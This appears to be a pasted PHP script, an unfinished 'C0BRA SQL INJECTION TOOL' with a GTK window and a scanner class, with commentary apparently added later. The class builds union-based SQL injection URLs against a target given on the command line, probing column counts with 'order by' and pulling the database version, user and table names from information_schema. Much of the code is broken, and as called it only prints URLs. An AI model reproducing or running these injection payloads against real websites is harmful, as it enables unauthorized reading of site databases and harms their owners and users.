
Untitled

a guest
Apr 24th, 2018
  1. <?php
  // Startup guard: the script cannot build its window without the php-gtk2
  // extension, so stop with a hint when the 'gtk' class is not available.
  if (class_exists('gtk') === false) {
      die("Please load the php-gtk2 module in your php.ini\r\n");
  }
  /**
   * Click handler wired to the "_Attack" button.
   *
   * It only grows a function-static string by "hi" on every call and writes
   * the result into the entry widget it receives; it does not read the entry
   * and does not reference the scanner class.
   *
   * @param object $aTxtBoxA Widget exposing set_text() (a GtkEntry in this script).
   */
  function on_interactive_dialog_clicked($aTxtBoxA)
  {
      // Persists across calls: "hi", "hihi", "hihihi", ...
      static $clickText;

      $clickText = ($clickText == null) ? "hi" : $clickText . "hi";

      $aTxtBoxA->set_text($clickText);
  }
  // ---- Widgets -----------------------------------------------------------
  $wnd = new GtkWindow();
  $lblCredit = new GtkLabel('Please Enter URI To Attack');
  $lblUsername = new GtkLabel('_Username', true);
  $txtBoxA = new GtkEntry();
  $txtBoxB = new GtkEntry();
  // Created but never added to any container in this script.
  $txtPassword = new GtkEntry();
  $textBuffer = new GtkTextBuffer();
  $textView = new GtkTextView();
  $btnAttack = new GtkButton('_Attack');
  $btnCancel = new GtkButton('_Quit');
  $tbl = new GtkTable(3, 2);
  $bbox = new GtkHButtonBox();
  $vbox = new GtkVBox();

  // ---- Window and signal wiring --------------------------------------------
  $wnd->set_title('C0BRA SQL INJECTION TOOL');
  $wnd->connect_simple('destroy', array('gtk', 'main_quit'));
  $btnCancel->connect_simple('clicked', array($wnd, 'destroy'));
  // The button handler receives the first entry widget only; the handler
  // writes into it and nothing in this wiring reaches the scanner class.
  $btnAttack->connect_simple('clicked', 'on_interactive_dialog_clicked', $txtBoxA);

  // ---- Layout: heading row, then label + entry, then a second entry --------
  $tbl->attach($lblCredit, 0, 2, 0, 1);
  $tbl->attach($lblUsername, 0, 1, 1, 2);
  $tbl->attach($txtBoxA, 1, 2, 1, 2);
  $tbl->attach($txtBoxB, 1, 2, 2, 3);

  $bbox->set_layout(Gtk::BUTTONBOX_EDGE);
  $bbox->add($btnCancel);
  $bbox->add($btnAttack);

  $vbox->pack_start($tbl);
  $vbox->pack_start($bbox);
  $wnd->add($vbox);

  $wnd->show_all();

  // Enter the GTK main loop. Control returns to the statements below only
  // after 'main_quit' runs (the window's 'destroy' signal is bound to it).
  Gtk::main();
  /**
   * Appends SQL fragments to a caller-supplied URL and fetches the resulting
   * URLs with file_get_contents(), then compares or slices the responses.
   *
   * Triage notes for defenders, all taken from the literals in this class:
   *  - request URLs end in "%20order%20by%20<n>--", or contain
   *    "%20union%20select%20" followed by "@@version", "user()", "COUNT(*)",
   *    "table_name", "information_schema.tables", or the marker
   *    "CHAR(0x6775797468656b696e67)" (the hex bytes decode to "guytheking");
   *  - the last character of the URL is rewritten with a leading "-";
   *  - every probe is a plain GET issued through PHP's URL stream wrapper;
   *    NOTE(review): presumably sent without a User-Agent header unless the
   *    user_agent ini setting is configured - confirm before using as a signal.
   *
   * An endpoint that binds its parameters (prepared statements) and rejects
   * non-numeric values for numeric parameters does not react to these suffixes.
   *
   * As pasted, only getVulbField() is called by the script, and that path
   * prints URLs without requesting them.
   */
  class scanner {
      // URL exactly as passed to the constructor.
      protected $originalSiteToAttack;
      // Byte length of that URL; used to cut appended suffixes back off.
      protected $siteStrln;

      /**
       * Stores the URL and its byte length.
       *
       * @param string $aSite URL to operate on (defaults to the empty string).
       */
      function __construct($aSite = "")
      {
          $this->originalSiteToAttack = $aSite;
          $this->siteStrln = strlen($this->originalSiteToAttack);
      }

      /**
       * Fetches the URL with "order by 1--" appended as a baseline, then repeats
       * with 1..4 and compares response byte lengths against the baseline.
       *
       * In SQL, ORDER BY <n> addresses a column position, so despite the method
       * name the value concerns columns, not rows.
       *
       * @return int|null The last index whose response length still matched the
       *                  baseline (i - 1); null when all four lengths match.
       */
      private function numberOfRows()
      {
          $originalSiteToAttack = $this->originalSiteToAttack;
          $originalSiteToAttack.= "%20order%20by%201--";
          // Baseline response; no check for a failed fetch (false).
          $defHtml = file_get_contents($originalSiteToAttack);
          for ($i=1;$i<5;$i++)
          {
              if ($i != 1)
              {
                  // Cut back to the original URL, then append the next index.
                  $originalSiteToAttack = substr($originalSiteToAttack , 0, $this->siteStrln);
                  $originalSiteToAttack = $originalSiteToAttack . "%20order%20by%20$i--";
              }
              // For $i == 1 this requests the same URL as the baseline.
              $notDefHtml = file_get_contents($originalSiteToAttack);
              if (strlen($notDefHtml) != strlen($defHtml))
              {
                  return --$i;
              }
          }
      }

      /**
       * Returns the stored URL with its last character prefixed by "-" and a
       * "union select" list appended; the list entry is chosen by $aOption and
       * repeated for a hard-coded count of 2.
       *
       * @param string     $aOption One of "version", "vulnurbilityfield", "dbuser",
       *                            "numberoftables", "tables" (spelling as in the code).
       * @param string|int $aTable  Offset interpolated into "limit <offset>,1";
       *                            only read by the "tables" case.
       * @return string|null The built URL, or null for any other $aOption (the
       *                     switch has no default branch).
       */
      private function buildQuery($aOption,$aTable='')
      {
          $originalSiteToAttack = $this->originalSiteToAttack;
          // Hard-coded; the measured value is not used (see commented line below).
          $numberOfRows = 2;
          //$numberOfRows = $this->numberOfRowsVar;
          // Replace the URL's final character X with "-X".
          $fieldChar = substr($originalSiteToAttack, -1);
          $fieldChar = "-$fieldChar";
          $originalSiteToAttack = substr($originalSiteToAttack , 0, $this->siteStrln-1);
          $originalSiteToAttack.="$fieldChar";
          $originalSiteToAttack .= "%20union%20select%20";
          // Each case returns from inside the switch, so the trailing `break`
          // statements after `return` are never reached.
          switch ($aOption)
          {
              case "version":
              for ($i=1;$i<=$numberOfRows;$i++)
              {
                  if ($i==$numberOfRows)
                  {
                      $originalSiteToAttack.= "@@version%20";
                      break;
                  }
                  // (original comment: "the hex code king" - no marker is used in this case)
                  $originalSiteToAttack.= "@@version%20,";
              }
              $originalSiteToAttack.="--";
              return $originalSiteToAttack;
              break;
              case "vulnurbilityfield":
              for ($i=1;$i<=$numberOfRows;$i++)
              {
                  if ($i==$numberOfRows)
                  {
                      $originalSiteToAttack.= "CHAR(0x6775797468656b696e67)";
                      break;
                  }
                  // Marker literal: the hex bytes decode to "guytheking".
                  $originalSiteToAttack.= "CHAR(0x6775797468656b696e67),";
              }
              $originalSiteToAttack.="--";
              return $originalSiteToAttack;
              break;
              case "dbuser":
              for ($i=1;$i<=$numberOfRows;$i++)
              {
                  if ($i==$numberOfRows)
                  {
                      $originalSiteToAttack.= "user()";
                      break;
                  }
                  // (original comment: "the hex code king" - no marker is used in this case)
                  $originalSiteToAttack.= "user(),";
              }
              $originalSiteToAttack.="--";
              return $originalSiteToAttack;
              break;
              case "numberoftables":
              for ($i=1;$i<=$numberOfRows;$i++)
              {
                  if ($i==$numberOfRows)
                  {
                      $originalSiteToAttack.= "COUNT(*)";
                      break;
                  }
                  // (original comment: "the hex code king" - no marker is used in this case)
                  $originalSiteToAttack.= "COUNT(*),";
              }
              $originalSiteToAttack.="%20from%20information_schema.tables--";
              return $originalSiteToAttack;
              break;
              case "tables":
              for ($i=1;$i<=$numberOfRows;$i++)
              {
                  if ($i==$numberOfRows)
                  {
                      $originalSiteToAttack.= "table_name";
                      break;
                  }
                  // (original comment: "the hex code king" - no marker is used in this case)
                  $originalSiteToAttack.= "table_name,";
              }
              // $aTable is interpolated as-is into the limit clause.
              $originalSiteToAttack.="%20from%20information_schema.tables%20limit%20$aTable,1--";
              return $originalSiteToAttack;
              break;
          }
      }

      /**
       * Fetches the "numberoftables" URL and returns a 10-byte slice of the
       * response, starting at the offset reported by locateVulnFieldPos().
       *
       * @return string Raw slice of the response body; not converted to a number.
       */
      private function numberOfTables()
      {
          $originalSiteToAttack = $this->buildQuery("numberoftables");
          $defHtml = file_get_contents($originalSiteToAttack);
          // The offset is measured on a second, separate response.
          $relPosition = $this->locateVulnFieldPos();
          return substr($defHtml,$relPosition,10); //echo $originalSiteToAttack;
      }

      /**
       * Fetches the "version" URL and returns a 10-byte slice of the response,
       * starting at the offset reported by locateVulnFieldPos().
       *
       * @return string Raw slice of the response body.
       */
      private function versionNumber()
      {
          $originalSiteToAttack = $this->buildQuery("version");
          $defHtml = file_get_contents($originalSiteToAttack);
          // The offset is measured on a second, separate response.
          $relPosition = $this->locateVulnFieldPos();
          return substr($defHtml,$relPosition,10); //echo $originalSiteToAttack;

      }

      /**
       * Fetches the "dbuser" URL and returns a 10-byte slice of the response,
       * starting at the offset reported by locateVulnFieldPos().
       *
       * @return string Raw slice of the response body.
       */
      private function dbUser()
      {
          $originalSiteToAttack = $this->buildQuery("dbuser");
          $defHtml = file_get_contents($originalSiteToAttack);
          // The offset is measured on a second, separate response.
          $relPosition = $this->locateVulnFieldPos();
          return substr($defHtml,$relPosition,10); //echo $originalSiteToAttack;
      }

      /**
       * Fetches the marker URL and looks for the substring "king" in the response.
       *
       * @return int|false Byte offset of the first "king", or false when absent;
       *                   callers pass the value to substr() without checking it.
       */
      private function locateVulnFieldPos()
      {
          $originalSiteToAttack = $this->buildQuery("vulnurbilityfield");
          $defHtml = file_get_contents($originalSiteToAttack);
          $pos = strpos($defHtml, "king");
          return $pos;
      }

      /**
       * Requests one "tables" URL per offset from 0 up to and including the value
       * from numberOfTables(), echoes each URL, and prints the collected 10-byte
       * slices with print_r().
       *
       * Every iteration makes two requests (the query and the marker lookup).
       * Nothing is returned; output goes to stdout only.
       */
      public function returnTables()
      {
          $numberOfTables = $this->numberOfTables();
          // Loop bound is a raw response slice compared loosely against $i.
          for ($i=0;$i<=$numberOfTables;$i++)
          {
              $originalSiteToAttack = $this->buildQuery("tables",$i);
              echo $originalSiteToAttack."\n";
              $defHtml = file_get_contents($originalSiteToAttack);
              $relPosition = $this->locateVulnFieldPos();
              // $arrayToReturn is not initialised before the loop.
              $arrayToReturn[$i] = substr($defHtml,$relPosition,10); //echo $originalSiteToAttack;
          }
          print_r($arrayToReturn);
      }

      /**
       * Rewrites each "&name=value" parameter after the first "&" so that the
       * value is prefixed with "-", appends marker entries, and echoes the URLs.
       *
       * No HTTP request is made here: the fetch and the marker search are
       * commented out, so the method only prints text and returns nothing (null).
       */
      private function findVulnField()
      {
          $originalSiteToAttack = $this->originalSiteToAttack;
          $originalSiteToAttack .= "%20union%20select%20";
          // Read but never used below.
          $siteStrln = $this->siteStrln;
          // Everything from the first "&" onward; $matches[0] is not checked for
          // a URL that contains no "&".
          $pattern = '/&.*/';
          preg_match($pattern, $originalSiteToAttack, $matches);
          $explodedGets = explode("&",$matches[0]);
          //$numberOfRows = $this->getNumberOfRows();
          $numberOfRows = 2;
          // Index 0 is the empty string before the leading "&", hence the start at 1.
          for ($i=1;$i<count($explodedGets);$i++)
          {
              // Split "name=value" after the "=", drop everything from the first
              // "%" in the value, and rebuild it as "name=-value".
              $pos = strpos($explodedGets[$i], "=");
              $pos++;
              $strCutedA = substr($explodedGets[$i], 0, $pos);
              $strCutedB = substr($explodedGets[$i], $pos, strlen($explodedGets[$i]));
              $strCutedB = preg_replace('/%.*/', "", $strCutedB);
              $explodedGetsB[$i] = $strCutedA."-".$strCutedB;
          }

          for ($i=1;$i<=count($explodedGetsB);$i++)
          {
              // Prints a literal run of "$" characters followed by the index.
              echo "$$$$$$$".$i."\n";
              // The URL string is carried over between iterations, not reset.
              $originalSiteToAttack = str_replace($explodedGets[$i],$explodedGetsB[$i],$originalSiteToAttack);
              for ($j=1;$j<=$numberOfRows;$j++)
              {
                  if ($j==$numberOfRows)
                  {
                      $originalSiteToAttack.= "CHAR(0x6775797468656b696e67)";
                      //break;
                  }
                  // Marker literal: the hex bytes decode to "guytheking".
                  $originalSiteToAttack.= "CHAR(0x6775797468656b696e67),";
              }
              $originalSiteToAttack.="--";
              echo $originalSiteToAttack."\n";
              //$defHtml = file_get_contents($originalSiteToAttack);
              //$pos = strrpos($defHtml,"king");
              //echo $pos;
          }
      }

      /**
       * Runs findVulnField() and caches its result.
       *
       * @return null findVulnField() has no return statement, so this is null.
       */
      public function getVulbField()
      {
          // vulnField is not declared on the class; it is created dynamically here.
          $this->vulnField = $this->findVulnField();
          return $this->vulnField;
      }

      /**
       * Runs versionNumber() and caches the slice it returns.
       *
       * @return string 10-byte response slice from versionNumber().
       */
      public function getVersionNumber()
      {
          // dbVersion is not declared on the class; it is created dynamically here.
          $this->dbVersion = $this->versionNumber();
          return $this->dbVersion ;
      }

      /**
       * Runs numberOfRows() and caches the result.
       *
       * @return string The cached value with "\n" appended (string concatenation).
       */
      private function getNumberOfRows()
      {
          // numberOfRowsVar is not declared on the class; created dynamically here.
          $this->numberOfRowsVar = $this->numberOfRows();
          return $this->numberOfRowsVar."\n";
      }

      /**
       * Runs dbUser() and caches the slice it returns.
       *
       * @return string 10-byte response slice from dbUser().
       */
      public function getUser()
      {
          // dbUserField is not declared on the class; it is created dynamically here.
          $this->dbUserField = $this->dbUser();
          return $this->dbUserField;
      }

      /**
       * Runs numberOfTables() and caches the slice it returns.
       *
       * @return string 10-byte response slice from numberOfTables().
       */
      private function getNumberOfTables()
      {
          // numberTables is not declared on the class; it is created dynamically here.
          $this->numberTables = $this->numberOfTables();
          return $this->numberTables;
      }

      /**
       * Calls getNumberOfTables() and discards the value; returns nothing.
       */
      private function getTables()
      {
          $numberOfTables = $this->getNumberOfTables();
      }

      /**
       * @return string The URL originally passed to the constructor.
       */
      public function __toString()
      {
          return $this->originalSiteToAttack;
      }

  }
  279.  
  // Command-line entry: -t <url> is handed to the scanner, -d <value> is read
  // into $db and not used afterwards. Neither option is checked for presence.
  // These statements sit after Gtk::main(), so they run only once the GTK
  // main loop has returned.
  $arguments = getopt("t:d:");
  $target = $arguments["t"];
  $db = $arguments["d"];

  $scannerObject = new scanner($target);

  // The original leaves calls to getVersionNumber(), getUser() and
  // returnTables() commented out; getVulbField() is the only method invoked.
  print $scannerObject->getVulbField();
  291.  
  292.  
  293. ?>